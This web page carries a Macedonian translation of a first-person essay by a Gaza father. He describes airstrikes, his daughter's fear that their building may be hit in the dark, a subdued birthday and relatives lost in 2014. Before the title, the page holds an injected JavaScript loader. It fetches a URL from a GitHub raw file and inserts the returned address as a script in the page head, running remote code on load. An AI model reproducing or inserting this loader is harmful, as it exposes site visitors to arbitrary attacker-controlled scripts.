;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Ме прашува моето дете: „Може ли Израел да ја уништи нашата зграда ако немаме струја?" - Антропол
АктуелноИнтернационално

Ме прашува моето дете: „Може ли Израел да ја уништи нашата зграда ако немаме струја?”

Тал Ал-Хава, Појасот Газа – во вторникот вечерта, мојата жена заедно со нашите шест деца и јас, се собравме во дневната соба од нашиот стан, место кое најмалку веројатно може да биде погодено од залутаните израелски ракети или од шрапнелите кои се распрскуваат.

Го гледавме во живо на Al Jazeera уништувањето на Ал-Хавхара, една од најголемите згради од страна на израелските воени авиони, откако снема струја.

Мојата осум годишна Лина, ме праша: „Дали тие можат да ја уништат нашата зграда, сега кога немаме струја?”

Следниот ден, среда, ќе беше роденден на Амал, која требаше да наполни шест години и последните две години имаше навика да поминува шест месеци планираjќи го својот следен роденден, проследено со наредни шест месеци да се потсеќа на роденденската прослава. Таа е потивка од нејзината сестра Лина и малку наивна за светот околу неjзе. Би сакал да беше малку повеќе наивна.

Кога Амал се разбуди во средата, таа не ја побара својата роденденска торта, ниту пак свеќите. Како да знаеше дека нешто не е во ред. Го почувствува стравот во домот, слушајќи ги постојаните бомбардирања. Мојата сопруга Нусајба, во секој случај инсистираше за прослава. „Треба да биде ден на надеж”, рече таа. Секако, десетици семејства ги загубија своите домови во Газа изминативе неколку дена, голем број луѓе починаа, не е време за прослави или торти. „Но, не можеме да му попуштиме на Израел”, рече Нусајба.

Излегов надвор од куќата без да ја носам мојата маска против ковид, да не изгледам маскиран, за да не би бил мета на изрелските дронови.

Ги купив омилените бадеми од Јордан и чоколадни бисквити за Амал. Кога се вратив, се потрудивме да направиме потивка изведба на „Сена Хелва” („Среќен Роденден”), со далеку помала нежност од вообичаената. Амал се насмевна збунето. Ја погледнав и и’ ветив дека ќе ја однесам да ја земе најголемата торта откако „ова” ќе заврши. Во понеделникот, откако нападите зачестија, не им ги раскажував приспивните приказни на моите деца. Тоа беше грешка која ќе се обидам да не ја повторам никогаш.

Оттогаш, се обидувам малку да ги извртам приказните заради бомбардирњето. Во оригиналната верзија на една приказна што ја измислив за моите деца, две мачиња умираат поради напуштање од нивниот сопственик кој не се грижи за нив. Сега им велам дека мачињата и’ припаѓаат на едно мало девојче по име Амол и тие само се разболуваат, но пак оздравуваат, зато што Амол е грижлива и со добро срце.

Како што е обичајот во Газа, кога родителите ќе ја завршат приспивната приказна за децата, користиме рима како за крај: „Toota toota, khalasat el hadoota. Hilwa walla maltouta?” („Приказната е завршена. Дали беше убава или не?”). Децата најчесто одговараат со ”Maltouta”, што значи ”не е убава”, па потоа следи друга приказна. Во вторникот кога го поставив прашањето, Лина и Амал одговорија нервозно и едногласно: „ Hilwa” („Убаво!”). Нема повеќе.

Повеќето жители на Газа кои ги знам, одвај одмориле од почетокот на неделава. Како што твитна мојот пријател Хасан Арафат: „Не спиеме, само се онесвестуваме од замор”. Тука нема високо технолошки системи да не’ предупредат за ракетите кои доаѓаат за да се засолните. Мораме да ги научиме да ги читаме шемите на безобразни удари на Израел. Да се биде добар родител во Газа, значи способност да предвидите кој е следниот чекор на израелските беспилотни летала и F-16.

По двочасовно непрекинато бомбардирање во средата, израелски ракети кои паѓаа како дожд низ целиот појас, некои паднаа само на стотина метри од нашата зграда. Конечно успеавме да заспиеме. Ракетите ја потресоја целата област неколку секунди, потоа слушате врисоци, викање, уште врисоци. Цели семејства излегоа на улица. Нашите деца седеа во кревет, се тресеа во молк и тишина. После сето ова следува неподнослива неодлучност. Заробен помеѓу тоа што сакам да го изнесам семејството надвор и покрај ракетите, распрскувањето на шрапнелите и паѓањето на остатоците и да останиме дома, како патки кои стојат – лесна мета за американските авиони пилотирани од Израел. Останавме дома.

Барем ќе умреме заедно, си помислив.

Заглушувачките удари ја уништуваат инфраструктурата на Газа, отсекуваат патишта што водат до болници и снабдување со вода, го намалуваат пристапот до интернет. Многу од целите што ги погоди Израел немаат стратешка вредност за Газа. Израел ова го знае и знае како да не’ вознемири. Се прашувам, што прават тие офицери во нивните командни центри? Дали „влечат сламки” кој блок да се уништи? Или „фрлаат коцки”?

Среда – последниот ден од Рамазан – Светиот месец на пост кој завршува со Курбан Бајрам, прослава која се смета за втора најсреќна во исламот. Децата традиционално носат нова облека, добиваат парични подароци и играчки од роднините. Муслиманите во Палестина ги посетуваат своите семејства, јадат заедно. Не овој Бајрам, сепак. Рано наутро во четвртокот бевме информирни дека 69 лица го загубиле животот во Газа од израелските воздушни напади, вклучувајќи и команаданти на Хамас, групата што управува со појасот и 17 деца. Најмалку 7 Израелци, од кои едно дете, загинаа од стотиците ракети истрелани од Хамас.

Во  2014, за време на последната војна, Израел го уби мојот брат Хамада, го сруши мојот стан кога го сруши мојот семеен дом во кој беа сместени 40 лица. Тука загина и дедото на мојата сопруга, нејзиниот брат, нејзината сестра и трите деца на нејзината сестра. Се’ уште не сме ја надминале таа траума, ниту пак успеавме да ги обновиме домовите кои Израел ги уништи тогаш. Нусајба и јас сме една совршено просечна палестинска двојка. Меѓу нас изгубивме повеќе од 30 роднини.

Овие денови, додека лежиме во темнината ноќе, се плашам од најлошото и се плашам од најдоброто. Ако излезиме од ова живи, каква психичка последица ќе носат моите деца наредните години, живеејќи во постојан страв од следниот напад?

Во вторникот, Лина повторно го постави своето прашање, откако јас и сопругата не одговоривме за прв пат: „Дали можат дa ја уништат нашата зграда ако струјата е исклучена?” Сакав да и’ одговорам „Да мала Лина, Израел може да ја уништи прекрасната зграда Аl-Jawharah, или било која од нашите згради во мракот.”

Секој од нашите домови е полн со приказни што мора да се раскажат. Нашите домови ја иритираат израелската воена машина, ја потсмеваат, ја прогонуваат, дури и во мракот. Не може да го поднеси нивното постоење. Со американски даночни долари и меѓународен имунитет, Израел ќе продолжи да ги уништува нашите згради, се додека не остане ништо.”

Но, не можам да и’ кажам на Лина ништо од ова. Така лажам.

Не, душо. Тие не можат да не’ видат во темница…